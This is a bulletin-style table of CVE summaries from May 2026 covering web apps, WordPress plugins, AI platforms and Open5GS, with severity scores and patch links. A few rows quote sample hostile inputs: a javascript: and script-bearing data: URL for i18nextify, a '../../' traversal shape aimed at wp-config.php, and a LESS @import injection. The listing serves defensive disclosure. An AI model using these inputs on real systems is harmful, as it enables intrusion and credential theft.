| i18next--i18nextify | i18nextify is a JavaScript library that adds website internationalization via a script tag, without source code changes. Versions prior to 4.0.8 substitute {{key}} interpolation tokens inside src and href attribute values with the raw string returned by i18next.t(). The substitution logic in src/localize.js (the replaceInside handler) only guards against a duplicated http:// origin prefix - it does not validate the URL scheme of the substituted value. A translated value such as javascript:alert(1) or data:text/html,<script>...</script> is applied unchanged to the live DOM attribute when an attacker can influence the content of a translation file or the translation-backend response - for example, via a compromised translation CDN, user-contributed locales, a MITM on a plain-HTTP backend, or write access to the translation JSON. This issue was patched in version 4.0.8. | 2026-05-07 | 4.7 | CVE-2026-41692 https://github.com/i18next/i18nextify/security/advisories/GHSA-6457-mxpq-4fqq https://github.com/i18next/i18nextify/commit/16f23dbcdcf893673587f7a03355bf7ce0a0e49e |
| flarum--framework | Flarum is open-source forum software. Prior to versions 1.8.16 and 2.0.0-rc.1, Flarum's patch for CVE-2023-27577 restricted the @import and data-uri() LESS features in the custom_less setting, but the same restriction was never applied to other settings registered as LESS config variables (for example theme_primary_color and theme_secondary_color, as well as any key registered via Extend\Settings::registerLessConfigVar()). Those values are interpolated verbatim into the LESS source at compile time, allowing an authenticated administrator to craft a theme-color value that injects an arbitrary @import directive into the compiled forum.css. Because the underlying LESS parser honours @import (inline) '<path>', an attacker can read arbitrary files reachable by the PHP process (local file inclusion) or trigger outbound HTTP(S) requests (server-side request forgery). This issue has been patched in versions 1.8.16 and 2.0.0-rc.1. | 2026-05-08 | 4.9 | CVE-2026-41887 https://github.com/flarum/framework/security/advisories/GHSA-xjvc-pw2r-6878 https://github.com/flarum/framework/commit/2d90a1f19f0e46f8c7e1b07c48ba74b5e38f8410 https://github.com/flarum/framework/releases/tag/v1.8.16 https://github.com/flarum/framework/releases/tag/v2.0.0-rc.1 |
| icip-cas--PPTAgent | PPTAgent is an agentic framework for reflective PowerPoint generation. Prior to commit 418491a, PPTAgent is vulnerable to arbitrary file write and directory creation via markdown_table_to_image. This issue has been patched via commit 418491a. | 2026-05-04 | 4.6 | CVE-2026-42078 https://github.com/icip-cas/PPTAgent/security/advisories/GHSA-hrcw-xc63-g29m https://github.com/icip-cas/PPTAgent/commit/418491a9a1c02d9d93194b5973bb58df35cf9d00 |
| icip-cas--PPTAgent | PPTAgent is an agentic framework for reflective PowerPoint generation. Prior to commit 418491a, there is an arbitrary file write vulnerability via `save_generated_slides`. This issue has been patched via commit 418491a. | 2026-05-04 | 4.6 | CVE-2026-42080 https://github.com/icip-cas/PPTAgent/security/advisories/GHSA-pxhg-7xr2-w7xg https://github.com/icip-cas/PPTAgent/commit/418491a9a1c02d9d93194b5973bb58df35cf9d00 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to versions 6.10.5 and 7.0.0-rc3, OpenC3 COSMOS contains a design flaw in the save_tool_config() function that allows saving tool configuration files at arbitrary locations inside the shared /plugins directory tree by supplying crafted configuration filenames. Although the implementation sufficiently mitigates standard path traversal attacks, by canonicalizing filename to an absolute path, all plugins share this same root directory. That enables users to create arbitrary file structures and overwrite existing configuration files within the shared /plugins directory. This issue has been patched in versions 6.10.5 and 7.0.0-rc3. | 2026-05-04 | 4.3 | CVE-2026-42085 https://github.com/OpenC3/cosmos/security/advisories/GHSA-4jvx-93h3-f45h https://github.com/OpenC3/cosmos/commit/9957a9fa460c0c0cf5cdbf6a5931bbdd025246a5 https://github.com/OpenC3/cosmos/commit/e6efccbd148ba0e3361c5891027f2373aa140d42 https://github.com/OpenC3/cosmos/releases/tag/v6.10.5 https://github.com/OpenC3/cosmos/releases/tag/v7.0.0-rc3 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to version 7.0.0, the Command Sender UI uses an unsafe eval() function on array-like command parameters, which allows a user-supplied payload to execute in the browser when sending a command. This creates a self-XSS risk because an attacker can trigger their own script execution in the victim's session, if allowed to influence the array parameter input, for example via phishing. If successful, an attacker may read or modify data in the authenticated browser context, including session tokens in local storage. This issue has been patched in version 7.0.0. | 2026-05-04 | 4.6 | CVE-2026-42086 https://github.com/OpenC3/cosmos/security/advisories/GHSA-ffq5-qpvf-xq7x |
| xwiki-contrib--macro-plantuml | PlantUML Macro is a macro for rendering UML diagrams from simple textual schemes. Prior to version 2.4.1, the PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the server parameter. However, the application does not validate the supplied URL. An attacker can supply an internal IP address or a malicious external URL. The XWiki server will attempt to connect to this URL to "render" the diagram. This issue has been patched in version 2.4.1. | 2026-05-04 | 4.4 | CVE-2026-42140 https://github.com/xwiki-contrib/macro-plantuml/security/advisories/GHSA-42fc-7w97-8vrc https://github.com/xwiki-contrib/macro-plantuml/commit/c8b19bda93058794e04c8862fc7ca85c59b5fe5c https://jira.xwiki.org/browse/PLANTUML-25 |
| onyx-dot-app--onyx | Onyx is an open-source AI platform. Prior to versions 3.0.9, 3.1.6, and 3.2.6, the POST /chat/stop-chat-session/{chat_session_id} endpoint lets any authenticated user stop any other user's active chat session. The endpoint checks authentication but never verifies the session belongs to the caller. An attacker who knows a chat session UUID can kill another user's LLM generation mid-stream. This issue has been patched in versions 3.0.9, 3.1.6, and 3.2.6. | 2026-05-08 | 4.3 | CVE-2026-42276 https://github.com/onyx-dot-app/onyx/security/advisories/GHSA-rw6w-hp62-gc8w |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to version 2.47.13, when n8n-mcp runs in HTTP transport mode, authenticated MCP tools/call requests had their full arguments and JSON-RPC params written to server logs by the request dispatcher and several sibling code paths before any redaction. When a tool call carries credential material - most notably n8n_manage_credentials.data - the raw values can be persisted in logs. In deployments where logs are collected, forwarded to external systems, or viewable outside the request trust boundary (shared log storage, SIEM pipelines, support/ops access), this can result in disclosure of: bearer tokens and OAuth credentials sent through n8n_manage_credentials, per-tenant API keys and webhook auth headers embedded in tool arguments, arbitrary secret-bearing payloads passed to any MCP tool. The issue requires authentication (AUTH_TOKEN accepted by the server), so unauthenticated callers cannot trigger it; the runtime exposure is also reduced by an existing console-silencing layer in HTTP mode, but that layer is fragile and the values are still constructed and passed into the logger. This issue has been patched in version 2.47.13. | 2026-05-08 | 4.3 | CVE-2026-42282 https://github.com/czlonkowski/n8n-mcp/security/advisories/GHSA-wg4g-395p-mqv3 https://github.com/czlonkowski/n8n-mcp/commit/59b665bda36797823df238aeaf20adb862c9f451 https://github.com/czlonkowski/n8n-mcp/releases/tag/v2.47.13 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0383, an OS command injection vulnerability exists in the netrw standard plugin bundled with Vim. By inducing a user to open a crafted URL (e.g., using the sftp:// or file:// protocol handlers), an attacker can execute arbitrary shell commands with the privileges of the Vim process. This issue has been patched in version 9.2.0383. | 2026-05-08 | 4.4 | CVE-2026-42307 https://github.com/vim/vim/security/advisories/GHSA-85ch-p2qr-m5gx https://github.com/vim/vim/commit/405e2fb6d54d5653523809e2853d99d1c000a5fc https://github.com/vim/vim/releases/tag/v9.2.0383 |
| Mintplex-Labs--anything-llm | AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to version 1.12.1, GET /api/workspace/:slug/tts/:chatId in AnythingLLM returns the text-to-speech audio for another user's chat response within the same workspace because the route validates workspace membership but does not enforce ownership of the targeted chat row. As a result, an authenticated user can access another user's private assistant response in audio form if the chatId is known or guessed. This constitutes an insecure direct object reference (IDOR) affecting private chat response content exposed through the TTS endpoint. This issue has been patched in version 1.12.1. | 2026-05-08 | 4.3 | CVE-2026-42456 https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-jwqg-jfg3-x5vv https://github.com/Mintplex-Labs/anything-llm/commit/4f3f77119d342e5489d1ba7533ad6d51bdcd565f https://github.com/Mintplex-Labs/anything-llm/releases/tag/v1.12.1 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.15 contains an arbitrary file read vulnerability in the QMD backend memory_get function that allows callers to read any Markdown files within the workspace root. Attackers with access to the memory tool can bypass path restrictions by providing arbitrary workspace Markdown paths to read files outside canonical memory locations or indexed QMD result sets. | 2026-05-06 | 4.3 | CVE-2026-44111 GitHub Security Advisory (GHSA-f934-5rqf-xx47) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.15 - Arbitrary Markdown File Read via QMD memory_get |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to version 5.17.1, the screenshots, tasks, and component link API allowed for the enumeration of translations in a project inaccessible to the user. This issue has been patched in version 5.17.1. | 2026-05-07 | 4.3 | CVE-2026-44263 https://github.com/WeblateOrg/weblate/security/advisories/GHSA-gcg5-86jr-f7jg https://github.com/WeblateOrg/weblate/pull/19258 https://github.com/WeblateOrg/weblate/commit/6cf892c7bd50b667a65a99d716a90694f7d9f203 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.17.1 |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to version 5.17.1, the Markdown renderer used in user comments and other user-provided content didn't properly sanitize some attributes. This issue has been patched in version 5.17.1. | 2026-05-07 | 4.3 | CVE-2026-44264 https://github.com/WeblateOrg/weblate/security/advisories/GHSA-5cmv-3rc4-7279 https://github.com/WeblateOrg/weblate/pull/19259 https://github.com/WeblateOrg/weblate/commit/85abc9df88b7464f4c0e794aef752e45f4230f75 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.17.1 |
| kimai--kimai | Kimai is an open-source time tracking application. From version 2.32.0 to before version 2.56.0, users with the role System-Admin (ROLE_SYSTE_ADMIN) and the permission upload_invoice_template can upload PDF invoice templates, which can call pdfContext.setOption('associated_files', ...) inside the sandboxed Twig render. This is forwarded to mPDF's SetAssociatedFiles(), whose writer calls file_get_contents($entry['path']) during PDF output and embeds the bytes as a FlateDecode stream in the PDF. Any file readable by the PHP worker is returned to the attacker inside the rendered invoice. This issue has been patched in version 2.56.0. | 2026-05-08 | 4.1 | CVE-2026-44298 https://github.com/kimai/kimai/security/advisories/GHSA-h5fh-7hwr-97mw https://github.com/kimai/kimai/releases/tag/2.56.0 |
| ZTE--ZXCLOUD iRAI | A remote denial-of-service vulnerability exists in the ZTE Cloud PC client uSmartview, which may lead to memory corruption and remote denial of service. | 2026-05-07 | 4.7 | CVE-2026-44407 https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/4783596796997009530 |
| techjewel--Fluent Forms Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder | The Fluent Forms plugin for WordPress is vulnerable to Arbitrary File Read in versions up to and including 6.2.1. This is due to insufficient path validation in the getAttachments() method of EmailNotificationActions, which resolves attacker-supplied file-upload URLs into filesystem paths without verifying that the resolved path stays inside the WordPress uploads directory: a strpos() prefix check on the raw URL can be bypassed with traversal sequences, wp_normalize_path() does not resolve ".\..\" segments, and file_exists() then resolves them at the kernel level. This makes it possible for authenticated attackers with administrator access to read arbitrary files readable by the web-server user - including wp-config.php with its database credentials and authentication salts - by submitting a form whose admin notification is configured to attach a file-upload field and supplying a crafted URL of the shape <upload_baseurl>/../../<target> as the file-field value. The resolved file is attached to the outbound admin-notification email via wp_mail(). While the email can be triggered by unauthenticated users, the email recipient is not user-controlled. | 2026-05-06 | 4.9 | CVE-2026-6344 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0101113b-70c2-4db4-b6b1-b2412f6e1214?source=cve https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L121 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L130 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L133 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L135 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L137 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php#L151 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Hooks/Ajax.php#L17 https://plugins.trac.wordpress.org/browser/fluentform/trunk/app/Modules/SubmissionHandler/SubmissionHandler.php#L17 https://plugins.trac.wordpress.org/changeset/3513845/fluentform/trunk/app/Services/FormBuilder/Notifications/EmailNotificationActions.php |
| n/a--PgBouncer | PgBouncer before 1.25.2 did not perform an appropriate authorization check for the KILL_CLIENT admin command. All users with access to the administration console (which itself requires authorization) could run this command. It would have been correct to allow only users listed in the admin_users parameter. | 2026-05-09 | 4.3 | CVE-2026-6667 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| xavortm--DX Sources | The DX Sources plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.1. This is due to missing or incorrect nonce validation on the settings_page_build function. This makes it possible for unauthenticated attackers to modify the plugin's configuration options via a forged request, granted they can trick a logged-in site administrator into performing an action such as clicking on a link. | 2026-05-05 | 4.3 | CVE-2026-6700 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c96e57-0300-4ea7-a0c6-5d060b6e979d?source=cve https://plugins.trac.wordpress.org/browser/dx-sources/trunk/inc/settings.class.php#L46 https://plugins.trac.wordpress.org/browser/dx-sources/tags/2.0.1/inc/settings.class.php#L46 https://plugins.trac.wordpress.org/browser/dx-sources/trunk/inc/settings.class.php#L79 https://plugins.trac.wordpress.org/browser/dx-sources/tags/2.0.1/inc/settings.class.php#L79 |
| kazunii--addfreespace | The addfreespace plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-05 | 4.3 | CVE-2026-6701 | https://www.wordfence.com/threat-intel/vulnerabilities/id/40eaeb28-c721-4977-951d-582b7dc2bd12?source=cve https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace.php#L45 https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace.php#L45 https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L30 https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L30 https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L59 https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L59 https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace.php#L312 https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace.php#L312 https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L83 https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L83 |
| djangoproject--Django | An issue was discovered in 6.0 before 6.0.5 and 5.2 before 5.2.14. `django.middleware.cache.UpdateCacheMiddleware` erroneously caches requests where the `Vary` header contained an asterisk (`'*'`). This can lead to private data being stored and served. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Ahmad Sadeddin for reporting this issue. | 2026-05-05 | 4.3 | CVE-2026-6907 | Django security archive Django releases announcements Django security releases issued: 6.0.5 and 5.2.14 |
| Velocidex--velociraptor | An off-by-one error (CWE-193) in the ConsumeUnit16Array and ConsumeUnit64Array functions in Velocidex Velociraptor before version 0.76.5 on Windows and Linux allows a local attacker to cause a Denial of Service (DoS) via a process crash by providing a specially crafted .evtx file to the parse_evtx VQL plugin. | 2026-05-06 | 4.4 | CVE-2026-7572 | https://docs.velociraptor.app/announcements/advisories/cve-2026-7572/ |
| n/a--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.7. Affected is the function udm_nudr_dr_handle_subscription_authentication of the file /src/udm/nudr-handler.c of the component authentication-subscription Endpoint. Performing a manipulation results in denial of service. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 4.3 | CVE-2026-7779 | VDB-360976 \| Open5GS authentication-subscription Endpoint nudr-handler.c udm_nudr_dr_handle_subscription_authentication denial of service VDB-360976 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #806249 \| Open5gs UDM v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4418 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A weakness has been identified in Open5GS up to 2.7.7. Affected by this vulnerability is the function udm_state_operational of the file /src/udm/udm-sm.c of the component smf-registrations Endpoint. Executing a manipulation can lead to denial of service. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 4.3 | CVE-2026-7780 | VDB-360977 \| Open5GS smf-registrations Endpoint udm-sm.c udm_state_operational denial of service VDB-360977 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #806250 \| Open5gs UDM v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4419 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A security vulnerability has been detected in Open5GS up to 2.7.7. Affected by this issue is the function udm_nudm_uecm_handle_amf_registration_update of the file /src/udm/nudm-handler.c of the component amf-3gpp-access Endpoint. The manipulation leads to denial of service. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 4.3 | CVE-2026-7781 | VDB-360978 \| Open5GS amf-3gpp-access Endpoint nudm-handler.c udm_nudm_uecm_handle_amf_registration_update denial of service VDB-360978 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #806251 \| Open5gs UDM v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4420 https://github.com/open5gs/open5gs/ |
| FlowiseAI--Flowise | A weakness has been identified in FlowiseAI Flowise up to 3.0.12. Affected by this vulnerability is an unknown functionality of the component User Controller Handler. This manipulation of the argument userId/organizationId/workspaceId/email causes authorization bypass. The attack may be initiated remotely. The affected component should be upgraded. | 2026-05-06 | 4.3 | CVE-2026-8027 | VDB-361274 \| FlowiseAI Flowise User Controller authorization VDB-361274 \| CTI Indicators (IOB, IOC, IOA) Submit #777657 \| FlowiseAI Flowise <= 3.0.12 Authorization Bypass Through User-Controlled Key (CWE-639) https://gist.github.com/YLChen-007/3584e6ffa0bba6367328ecf0b46b0e4b |
| 8421bit--MiniClaw | A vulnerability was determined in 8421bit MiniClaw up to 43905b934cf76489ab28e4d17da28ee97970f91f. Affected by this vulnerability is the function isPathInside of the file src/kernel.ts of the component executeSkillScript. Executing a manipulation can lead to path traversal. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. This patch is called e8bd4e17e9428260f2161378356affc5ce90d6ed. It is advisable to implement a patch to correct this issue. | 2026-05-07 | 4.3 | CVE-2026-8113 | VDB-361901 \| 8421bit MiniClaw executeSkillScript kernel.ts isPathInside path traversal VDB-361901 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #808167 \| 8421bit MiniClaw 0 Path Traversal https://github.com/8421bit/MiniClaw/issues/5 https://github.com/8421bit/MiniClaw/pull/8 https://github.com/8421bit/MiniClaw/commit/e8bd4e17e9428260f2161378356affc5ce90d6ed https://github.com/8421bit/MiniClaw/ |
| SourceCodester--Pizzafy Ecommerce System | A security vulnerability has been detected in SourceCodester Pizzafy Ecommerce System 1.0. This issue affects some unknown processing of the file /admin/index.php. Such manipulation of the argument page leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-05-07 | 4.3 | CVE-2026-8117 | VDB-361905 \| SourceCodester Pizzafy Ecommerce System index.php cross site scripting VDB-361905 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #808327 \| sourcecodester Pizzafy Ecommerce System V1.0 Cross Site Scripting https://github.com/redshadowword-cell/CVE/issues/5 https://www.sourcecodester.com/ |
| n/a--Open5GS | A flaw has been found in Open5GS up to 2.7.7. The affected element is the function nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf of the file /src/nssf/nnssf-handler.c of the component NSSF. Executing a manipulation can lead to denial of service. The attack can be executed remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 4.3 | CVE-2026-8120 | VDB-361907 \| Open5GS NSSF nnssf-handler.c denial of service VDB-361907 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #808421 \| Open5gs NSSF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4432 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.7. The impacted element is the function ogs_sbi_parse_plmn_list in the library /lib/sbi/conv.c of the component NSSF. The manipulation leads to denial of service. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 4.3 | CVE-2026-8121 | VDB-361908 \| Open5GS NSSF conv.c ogs_sbi_parse_plmn_list denial of service VDB-361908 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #808422 \| Open5gs NSSF v2.7.7 Denial of Service Submit #808424 \| Open5gs NSSF v2.7.7 Denial of Service (Duplicate) https://github.com/open5gs/open5gs/issues/4433 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was found in Open5GS up to 2.7.7. This affects the function ogs_sbi_discovery_option_add_service_names in the library /lib/sbi/message.c of the component NSSF. The manipulation results in denial of service. The attack may be performed from remote. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 4.3 | CVE-2026-8122 | VDB-361909 \| Open5GS NSSF message.c ogs_sbi_discovery_option_add_service_names denial of service VDB-361909 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #808425 \| Open5gs NSSF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4435 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. This impacts the function ogs_sbi_discovery_option_add_snssais in the library /lib/sbi/message.c of the component NSSF. This manipulation causes denial of service. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 4.3 | CVE-2026-8123 | VDB-361910 \| Open5GS NSSF message.c ogs_sbi_discovery_option_add_snssais denial of service VDB-361910 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #808426 \| Open5gs NSSF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4436 https://github.com/open5gs/open5gs/ |
| n/a--osTicket | A security vulnerability has been detected in osTicket up to 1.18.3. Impacted is an unknown function of the file include/class.dispatcher.php of the component Dispatcher. The manipulation of the argument _method leads to cross-site request forgery. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-09 | 4.3 | CVE-2026-8194 | VDB-362346 \| osTicket Dispatcher class.dispatcher.php cross-site request forgery VDB-362346 \| CTI Indicators (IOB, IOC, IOA) Submit #802755 \| osTicket 1.18.3 Cross-Site Request Forgery https://github.com/osTicket/osTicket/pull/6945 https://github.com/az10b/security-advisories/blob/main/csrf_bypass_osTicket.md https://github.com/osTicket/osTicket/ |
| n/a--JeecgBoot | A vulnerability was detected in JeecgBoot up to 3.9.1. The affected element is an unknown function of the file jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/CommonController.java of the component SVG File Handler. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-09 | 4.3 | CVE-2026-8195 | VDB-362347 \| JeecgBoot SVG File CommonController.java cross site scripting VDB-362347 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #803528 \| jeecgboot JeecgBoot 3.9.1 Doubled Character XSS Manipulations https://github.com/xpp3901/CVE_APPLY/blob/main/V-006_SVG_Stored_XSS/README.md |
| codelibs--Fess | A vulnerability was detected in codelibs Fess up to 15.5.1. Affected by this issue is the function update of the file org/codelibs/fess/app/web/admin/design/AdminDesignAction.java of the component JSP File Handler. The manipulation of the argument content results in code injection. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-09 | 4.7 | CVE-2026-8211 | VDB-362419 \| codelibs Fess JSP File AdminDesignAction.java update code injection VDB-362419 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #804293 \| CodeLibs Fess 15.5.1 Arbitrary File Write https://bv3acdnplbr.feishu.cn/docx/Kk1tdEAfAoV6kZxVozUc8UA4nog?from=from_copylink |
| Dotouch--XproUPF | A vulnerability was determined in Dotouch XproUPF 2.0.0-release-088aa7c4. Affected is an unknown function of the component UPF. This manipulation causes improper access controls. A high degree of complexity is needed for the attack. Exploitation is said to be difficult. The vendor was contacted early about this disclosure. | 2026-05-10 | 4.6 | CVE-2026-8233 | VDB-362450 \| Dotouch XproUPF access control VDB-362450 \| CTI Indicators (IOB, IOC, TTP) Submit #808799 \| Dotouch XproUPF v2.0.0-release-088aa7c4 imp |
| n/a--Open5GS | A vulnerability was detected in Open5GS up to 2.7.7. The affected element is the function update_authorized_pcc_rule_and_qos of the file /src/smf/npcf-handler.c of the component SMF. The manipulation results in denial of service. The attack may be launched remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 4.3 | CVE-2026-8248 | VDB-362545 \| Open5GS SMF npcf-handler.c update_authorized_pcc_rule_and_qos denial of service VDB-362545 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #808472 \| Open5gs SMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4442 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A flaw has been found in Open5GS up to 2.7.7. The impacted element is the function update_authorized_pcc_rule_and_qos of the file /src/smf/npcf-handler.c of the component SMF. This manipulation causes denial of service. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 4.3 | CVE-2026-8249 | VDB-362546 \| Open5GS SMF npcf-handler.c update_authorized_pcc_rule_and_qos denial of service VDB-362546 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #808473 \| Open5gs SMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4443 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.7. This affects the function smf_n4_build_qos_flow_to_modify_list of the file /src/smf/n4-build.c of the component SMF. Such manipulation leads to denial of service. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 4.3 | CVE-2026-8250 | VDB-362547 \| Open5GS SMF n4-build.c smf_n4_build_qos_flow_to_modify_list denial of service VDB-362547 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #808476 \| Open5gs SMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4444 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was found in Open5GS up to 2.7.7. This impacts the function update_authorized_pcc_rule_and_qos of the file /src/smf/npcf-handler.c of the component SMF. Performing a manipulation results in denial of service. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 4.3 | CVE-2026-8251 | VDB-362548 \| Open5GS SMF npcf-handler.c update_authorized_pcc_rule_and_qos denial of service VDB-362548 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #808480 \| Open5gs SMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4445 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. Affected is the function smf_nsmf_handle_create_data_in_hsmf of the component SMF. Executing a manipulation can lead to null pointer dereference. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 4.3 | CVE-2026-8252 | VDB-362549 \| Open5GS SMF smf_nsmf_handle_create_data_in_hsmf null pointer dereference VDB-362549 \| CTI Indicators (IOB, IOC, IOA) Submit #808482 \| Open5gs SMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4446 https://github.com/open5gs/open5gs/ |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| HCL Software--BigFix Service Management (SM) | HCL BigFix Service Management (SM) application fails to strip EXIF metadata from uploaded images. This could lead to confidentiality and privacy risks if sensitive location information is unintentionally shared. | 2026-05-06 | 3.5 | CVE-2025-31959 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL Software--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is susceptible to a Root File System Not Mounted as Read-Only. An improperly configured root file system may allow unintended modifications to critical system components, potentially increasing the risk of system compromise or unauthorized changes. | 2026-05-06 | 3.9 | CVE-2025-31974 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL Software--BigFix Service Management (SM) | HCL BigFix Service Management (SM) had directories that were not linked or publicly visible but could be accessed directly. This could allow an increased risk of information disclosure or misuse of sensitive functionality. | 2026-05-06 | 3.7 | CVE-2025-31982 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
